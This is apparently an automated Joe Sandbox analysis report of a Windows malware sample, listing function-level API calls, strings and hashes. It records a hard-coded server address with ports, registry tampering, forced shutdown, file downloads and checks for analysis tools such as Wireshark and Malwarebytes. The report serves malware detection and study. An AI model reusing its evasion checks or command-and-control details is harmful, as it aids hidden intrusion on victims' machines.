                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681424410-0
                                                                                                                            • Opcode ID: 75aa0f3eec270cb076438a2e4985a75a6e1711fdaa80a351f9c765dcc6c1b66d
                                                                                                                            • Instruction ID: de239f0215da89d307f200eeb561be070257ed86f383a611e6368e6eb3aabdfd
                                                                                                                            • Opcode Fuzzy Hash: 75aa0f3eec270cb076438a2e4985a75a6e1711fdaa80a351f9c765dcc6c1b66d
                                                                                                                            • Instruction Fuzzy Hash: B7C08C3B34061002D214BAB47822F6ABB60DB84723F12042FB70A8C0C14C52849009AA
                                                                                                                            Function 0362B43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03627B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                              • Part of subcall function 03627B70: OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                              • Part of subcall function 03627B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                              • Part of subcall function 03627B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                              • Part of subcall function 03627B70: GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • ExitWindowsEx.USER32(00000006,00000000), ref: 0362B44D
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681424410-0
                                                                                                                            • Opcode ID: cddf6617c7e98b05f9dd0f350ec784ad3695c20eb16f7506ab22ae6da55fa71b
                                                                                                                            • Instruction ID: 13a682d045f739dc4a74b0c084f01f7c607efea1f1719833db43e2c6feeea7ca
                                                                                                                            • Opcode Fuzzy Hash: cddf6617c7e98b05f9dd0f350ec784ad3695c20eb16f7506ab22ae6da55fa71b
                                                                                                                            • Instruction Fuzzy Hash: 03C08C3B34021002D214BAB47822F6ABB60DB84723F11042FB60A8C0C14C5384A045AA
                                                                                                                            Function 0362B41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03627B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03627B89
                                                                                                                              • Part of subcall function 03627B70: OpenProcessToken.ADVAPI32(00000000), ref: 03627B90
                                                                                                                              • Part of subcall function 03627B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03627BB6
                                                                                                                              • Part of subcall function 03627B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03627BCC
                                                                                                                              • Part of subcall function 03627B70: GetLastError.KERNEL32 ref: 03627BD2
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BE0
                                                                                                                            • ExitWindowsEx.USER32(00000004,00000000), ref: 0362B429
                                                                                                                              • Part of subcall function 03627B70: CloseHandle.KERNEL32(?), ref: 03627BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 681424410-0
                                                                                                                            • Opcode ID: d9a3ad1435c7ee042422ad883ad53eff1b207d78f5359b66127eb7430e29a4d6
                                                                                                                            • Instruction ID: 73e06eef1a5cd094be5a142b9a9d23bbdc6143c11a65a1739e4f85b6f3cf0c46
                                                                                                                            • Opcode Fuzzy Hash: d9a3ad1435c7ee042422ad883ad53eff1b207d78f5359b66127eb7430e29a4d6
                                                                                                                            • Instruction Fuzzy Hash: 08C08C3B34021006D214BBB47822F69BB60DB84723F11042FB70A8C0C14C62849005AE
                                                                                                                            Function 0362B556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0362B586
                                                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0362B596
                                                                                                                            • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0362B5B3
                                                                                                                            • _memset.LIBCMT ref: 0362B5D4
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362B61B
                                                                                                                            • _memset.LIBCMT ref: 0362B63C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362B72C
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 0362B737
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F756
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F770
                                                                                                                              • Part of subcall function 0362F707: __CxxThrowException@8.LIBCMT ref: 0362F781
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                            • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                            • API String ID: 1186799303-3661167401
                                                                                                                            • Opcode ID: e4dc142ad7cfbf6b1463962197dee7cdfa33dfcf03bb4966a3f7a80ffbb89610
                                                                                                                            • Instruction ID: 9f5fc54357c2889c02567e16522bcd37d4783ff18f77d20ad8ea9c766931e300
                                                                                                                            • Opcode Fuzzy Hash: e4dc142ad7cfbf6b1463962197dee7cdfa33dfcf03bb4966a3f7a80ffbb89610
                                                                                                                            • Instruction Fuzzy Hash: 1741E479F807207FE310FA109C47F6E7764AF46B10F144018FA157E287EAE5E9158AAE
                                                                                                                            Function 02C39AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39ACE
                                                                                                                            • __mtterm.LIBCMT ref: 02C39ADA
                                                                                                                              • Part of subcall function 02C397A5: DecodePointer.KERNEL32(00000008,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C397B6
                                                                                                                              • Part of subcall function 02C397A5: TlsFree.KERNEL32(00000025,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C397D0
                                                                                                                              • Part of subcall function 02C397A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C3C031
                                                                                                                              • Part of subcall function 02C397A5: _free.LIBCMT ref: 02C3C034
                                                                                                                              • Part of subcall function 02C397A5: DeleteCriticalSection.KERNEL32(00000025,?,?,02C376A5,02C3768B,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C3C05B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C39AF0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C39AFD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C39B0A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C39B17
                                                                                                                            • TlsAlloc.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39B67
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39B82
                                                                                                                            • __init_pointers.LIBCMT ref: 02C39B8C
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39B9D
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BAA
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BB7
                                                                                                                            • EncodePointer.KERNEL32(?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BC4
                                                                                                                            • DecodePointer.KERNEL32(Function_00009929,?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39BE5
                                                                                                                            • __calloc_crt.LIBCMT ref: 02C39BFA
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,?,02C375E2,02C47B60,00000008,02C37776,?,?,?,02C47B80,0000000C,02C37831,?), ref: 02C39C14
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C39C26
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 6badf9945adb59d26cb32e70c4ae8c195e915ef91063f0c657fa46aef539f71e
                                                                                                                            • Instruction ID: cc731ae3d860bc6ef506df1bbbfcf91df44fc54147c975cbb4354492e668e089
                                                                                                                            • Opcode Fuzzy Hash: 6badf9945adb59d26cb32e70c4ae8c195e915ef91063f0c657fa46aef539f71e
                                                                                                                            • Instruction Fuzzy Hash: 06316239DC02159FD7226F78AC4871BFBE5AB953A8B540F26E404D3190DBB5C861EF50
                                                                                                                            Function 03634014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 0363401C
                                                                                                                            • __mtterm.LIBCMT ref: 03634028
                                                                                                                              • Part of subcall function 03633CF1: DecodePointer.KERNEL32(00000009,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633D02
                                                                                                                              • Part of subcall function 03633CF1: TlsFree.KERNEL32(00000027,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03633D1C
                                                                                                                              • Part of subcall function 03633CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03638D48
                                                                                                                              • Part of subcall function 03633CF1: _free.LIBCMT ref: 03638D4B
                                                                                                                              • Part of subcall function 03633CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03631084,0363106A,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03638D72
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0363403E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0363404B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03634058
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03634065
                                                                                                                            • TlsAlloc.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340B5
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340D0
                                                                                                                            • __init_pointers.LIBCMT ref: 036340DA
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340EB
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 036340F8
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634105
                                                                                                                            • EncodePointer.KERNEL32(?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634112
                                                                                                                            • DecodePointer.KERNEL32(Function_00013E75,?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634133
                                                                                                                            • __calloc_crt.LIBCMT ref: 03634148
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,?,03630FC1,03646278,00000008,03631155,?,?,?,03646298,0000000C,03631210,?), ref: 03634162
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03634174
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 3413e81f04353fa4050b68271cb9dbaee19bfcd6cc853ca211209ad9361f650e
                                                                                                                            • Instruction ID: 0af42d64a5a65cbc0eb9436d8ee3f3609e338eb856a1926c9c3035cb2c931c6a
                                                                                                                            • Opcode Fuzzy Hash: 3413e81f04353fa4050b68271cb9dbaee19bfcd6cc853ca211209ad9361f650e
                                                                                                                            • Instruction Fuzzy Hash: BB3152B9E50314AEDB51FF76AA0865ABEA4EB467A0F24652AE810C335CEB30D051DF44
                                                                                                                            Function 0362C3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                            • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                            • API String ID: 3970221696-33419044
                                                                                                                            • Opcode ID: 2eae2040571283f4b023cb50dff4ac4a0910d690ca502cf26155ebd758020fc3
                                                                                                                            • Instruction ID: 7ecbbd50257b01ef7e3a193c93c3fa487a847f7bf45f84391cb72bb549a2e968
                                                                                                                            • Opcode Fuzzy Hash: 2eae2040571283f4b023cb50dff4ac4a0910d690ca502cf26155ebd758020fc3
                                                                                                                            • Instruction Fuzzy Hash: 5C51EDB5E407287ADB20EB60CD49FEF7778DF55700F004599A70AAA180EBB1D684CFA5
                                                                                                                            Function 03627C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(wininet.dll), ref: 03627CC3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03627CD7
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 03627CF7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03627D16
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03627D53
                                                                                                                            • _memset.LIBCMT ref: 03627D7E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03627D8C
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03627DDB
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03627DF9
                                                                                                                            • Sleep.KERNEL32(00000001), ref: 03627E01
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03627E0D
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 03627E28
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                            • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                            • API String ID: 1463273941-1099148085
                                                                                                                            • Opcode ID: 0164292331e4a676dd3402889ff7d2d4fa5f07e0a1062103d6316ed13daf3a5d
                                                                                                                            • Instruction ID: 7e5f92a897c9f7bb9dd598b106f059e61c809f1aef94a68b04f1e6072654d881
                                                                                                                            • Opcode Fuzzy Hash: 0164292331e4a676dd3402889ff7d2d4fa5f07e0a1062103d6316ed13daf3a5d
                                                                                                                            • Instruction Fuzzy Hash: E841E375A4022CABD720EB648C41FEEB7F8BF45700F15C5A9F648A6280CEB05A458FE4
                                                                                                                            Function 03624530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0362455A
                                                                                                                            • timeGetTime.WINMM ref: 0362457B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362459B
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 036245BD
                                                                                                                            • SwitchToThread.KERNEL32 ref: 036245D7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03624620
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03624644
                                                                                                                            • send.WS2_32(?,036449C0,00000010,00000000), ref: 03624668
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03624686
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03624691
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 0362469F
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 036246B3
                                                                                                                            • closesocket.WS2_32(?), ref: 036246BD
                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 036246F6
                                                                                                                            • SetLastError.KERNEL32(000005B4), ref: 0362470A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362472B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03624743
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1692523546-0
                                                                                                                            • Opcode ID: f8c91582c3b1b4c3faaf4d2fa78b97acc60f92782bcc9986e179825ba5fd4033
                                                                                                                            • Instruction ID: b9172914b350dc79ff31928b4ea23da44ae324adb4803456bd411b12da98fd4e
                                                                                                                            • Opcode Fuzzy Hash: f8c91582c3b1b4c3faaf4d2fa78b97acc60f92782bcc9986e179825ba5fd4033
                                                                                                                            • Instruction Fuzzy Hash: 0991CF74600E22AFC726DF26D988B6AFBA5FF44700F158519E5168B648CB31E4A1CFD0
                                                                                                                            Function 0362A6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                                                            • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                            • API String ID: 1873853019-591889663
                                                                                                                            • Opcode ID: f4b2dc51d31b03f71f7cf5fa8c1dfcd7c26d199a96fae14d57feaf64e79470dd
                                                                                                                            • Instruction ID: f5868b110668cc0c5c2e4fcac64633bd70054b4acc2127b6f9328907a4772cbe
                                                                                                                            • Opcode Fuzzy Hash: f4b2dc51d31b03f71f7cf5fa8c1dfcd7c26d199a96fae14d57feaf64e79470dd
                                                                                                                            • Instruction Fuzzy Hash: C88126B5A40710AFE710EB54DC86F6B7B64AF05710F0A4068ED195F387EAB1E910CBA6
                                                                                                                            Function 03625CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 03625CD3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: VisibleWindow
                                                                                                                            • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                            • API String ID: 1208467747-3439171801
                                                                                                                            • Opcode ID: 30687647abda240c792ea9dc3d35839603d065bfb3d3040dcdc553fba53fac36
                                                                                                                            • Instruction ID: 03edbab6245c14bae4b60313fda24a7da565ac08ba5ae59c719c7e475ffe6d38
                                                                                                                            • Opcode Fuzzy Hash: 30687647abda240c792ea9dc3d35839603d065bfb3d3040dcdc553fba53fac36
                                                                                                                            • Instruction Fuzzy Hash: F6418EA6F41B217ADB71F5316E02FDF695C0D23486F09006AEE5BA8305F749921948EF
                                                                                                                            Function 02C34530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C3455A
                                                                                                                            • timeGetTime.WINMM ref: 02C3457B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C3459B
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C345BD
                                                                                                                            • SwitchToThread.KERNEL32 ref: 02C345D7
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C34620
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C34644
                                                                                                                            • send.WS2_32(?,02C47440,00000010,00000000), ref: 02C34668
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C34686
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C34691
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 02C3469F
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02C346B3
                                                                                                                            • closesocket.WS2_32(?), ref: 02C346BD
                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02C346F6
                                                                                                                            • SetLastError.KERNEL32(000005B4), ref: 02C3470A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C4FA44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3448239111-0
                                                                                                                            • Opcode ID: d3612e98c2cc9eb1fa591c7f9795f22ecde26448c36fdc776028150ce717336e
                                                                                                                            • Instruction ID: 26dc429d4cfc3b2cd89f46b63a4c91bc6fbee3754b7d04e1bb1ebdd06fba9f99
                                                                                                                            • Opcode Fuzzy Hash: d3612e98c2cc9eb1fa591c7f9795f22ecde26448c36fdc776028150ce717336e
                                                                                                                            • Instruction Fuzzy Hash: 0B510079A40615EFC73ADF64D888BAAB7B5FF84745F404A25E50187A80C770FAA0CBD0
                                                                                                                            Function 0362DA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
